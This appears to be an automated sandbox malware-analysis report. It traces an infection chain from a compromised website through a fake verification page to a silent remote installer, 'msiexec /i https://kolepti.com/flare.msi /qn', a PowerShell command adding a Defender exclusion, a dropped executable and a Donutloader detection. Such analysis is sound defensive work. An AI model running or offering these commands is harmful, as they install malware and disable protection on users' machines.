Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:35 GMTcontent-type: application/json; charset=utf-8server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=SNOJ%2FAAiXyeQWgMTm%2FYtopTmm83K5zZK2upxpUL1K3%2B3rDK1BxMmq0zyrInO2%2BPXtc27%2FUEv19AN788ajKLGqZ5ZekFeiKTfFTg%2Fxwo%3D"}]}content-encoding: zstdcf-ray: 9470b48e4b0d5287-LAXalt-svc: h3=":443"; ma=86400content-length: 32
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:38 GMTcontent-type: text/html; charset=UTF-8server: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}x-powered-by: Expresscache-control: public, max-age=14400last-modified: Tue, 08 Apr 2025 17:07:02 GMTvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZaIIvSeAGiK3%2BcnQBOtJ5yd1Kby1P3fDgzj770H%2BLf2UgitpLtacr47jCAWfFCxFJ2bQDiQvf4XoknD4HAE8e0bKJRaNn32vP5NOMyTYE5GrOV06hUc%3D"}]}cf-cache-status: EXPIREDcontent-encoding: zstdcf-ray: 9470b49b1bcdef75-LAXalt-svc: h3=":443"; ma=86400content-length: 818
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:49 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=U6%2BpPN4QrUqNeOoDBy5jKD%2BMA%2FvWQ4Vytwil%2FieDjf8hA0BhPSJWKCyAgJ07TM%2F2ogTtLe1TDetLXTnRrYT9RB0pg0lkZx4gI4sgEwS6QngKM%2BqtJFw%3D"}]}cf-cache-status: DYNAMICvary: accept-encodingcontent-encoding: zstdcf-ray: 9470b4e52cf3ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 818
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:52 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Q5q4U%2B7%2B0gJ%2BU69ifrDhI5qSXA8VF2m%2FqT0iMPpYPWDOgYucPstlLjk5LSJyVN5MPf%2B22qpu252wpc7loHbLsejebyVZA3%2B8RsI1lwjF2R67g9beZStpww%3D%3D"}]}cf-cache-status: DYNAMICvary: accept-encodingcontent-encoding: zstdcf-ray: 9470b4f25a8fcb93-LAXalt-svc: h3=":443"; ma=86400content-length: 818
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:53 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=xC0Q7Hi4noyunanxx%2FEUH%2BThVgxmACj7A%2BzdvsTniW%2B60q2XGhA24GuYl%2FUOVLbIxgOA1OJpZCN95OAAEPSMB1D71CyrygXDjZLDk%2BGEnfFcG8WwEEU%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b4ff4d8def75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:54 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Jq7YzULR4Pxb4qUCsV9dXOdNv7gRprFj9pDbvsbt5uMyIN%2BVhPRIjF9fLdz5usQkexJ05kvLTMBjdb%2BGHl72mDLaa6xyXl8h2lfXl%2FYD6%2FgsPOqL81s%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5023c92ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:54 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=7pCkIbuubRvwGrJJUW7paT4nM38Gb2kvKEra28Jh7jZ9VpYK%2BZr8VGnuXXrPQcrcR1Z9Tdbw7ykZW8ygDoUl4fNAl6R6gpiV5csWJwmB0kg9MhyY%2FXI%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5054b5def75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:55 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=fsMtKzRm9WdDPE6bIuQUOZcNFr%2FsL3pO2FNWo42L4R7YN8tVPnFR26%2F8YC8nyQdNdS%2FaNcQzSMxV4l3mbtvq%2BOQ8mS3Yp8Ai49%2BPKnUNgnQkyWwxy40%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5088b05ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8x-ws-ratelimit-limit: 1000x-ws-ratelimit-remaining: 999date: Wed, 28 May 2025 21:04:56 GMTserver: Apachex-powered-by: PHP/8.1.32content-encoding: gzipcontent-length: 36261
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8x-ws-ratelimit-limit: 1000x-ws-ratelimit-remaining: 998date: Wed, 28 May 2025 21:04:56 GMTserver: Apachex-powered-by: PHP/8.1.32content-encoding: gzipcontent-length: 32005

Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=71vzwGo%2Fhm%2FpDed9cgryHnFL4kUcpE9%2FU2dfsEHZyIoiO3Nv5l89b
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=zuflUyn6wpns%2BQxm6uLfjcnmMTjpCzagZEPQ5ZiJ00wYgmh1BDB91s43N
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://analytiscnode.com/
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://analytiscnode.com/A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgP
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgmV
Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/12180
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/?verified=true
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/?verified=true(
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/?verified=trueFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/?verified=truebmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9h
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/wp-content/themes/techze/custom.js?ver=1
Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/asuacrsguc:50:0
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0cross-origin-opener-policy-report-only:sam
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: cmd.exe, 0000001D.00000003.1732104353.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1743385571.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://fonts.gstatic.com/
Source: chrome.exe, 00000000.00000002.1959321274.0000016688AFC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp	String found in binary or memory: https://kolepti.com/flare.msi
Source: chrome.exe, 00000000.00000002.1960138926.0000016688C6A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb25
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp	String found in binary or memory: https://www.google.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5BF4.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE1FD.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	File created: C:\Windows\system32\Hueta.exe	Jump to behavior

Detected potential crypto function

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Code function: 0_3_000001668763F1D3	0_3_000001668763F1D3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Code function: 0_3_00000166876400B7	0_3_00000166876400B7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Code function: 0_3_000001668763F603	0_3_000001668763F603

Enables security privileges

Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe

Process token adjusted: Security

Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\filemanagers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\appidpolicyconverter.exe	Mutant created: PolicyMutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03

Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "HTTPS://cogniai.com"
Source: unknown	Process created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /i https://kolepti.com/flare.msi /qn
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\Hueta.exe "C:\Windows\system32\Hueta.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: 3b4007d200875d4c9c58c44073469727.tmp.23.dr	Static PE information: section name: .fptable
Source: gr0D62WdkfOXqpbHbRHp.25.dr	Static PE information: section name: .xdata

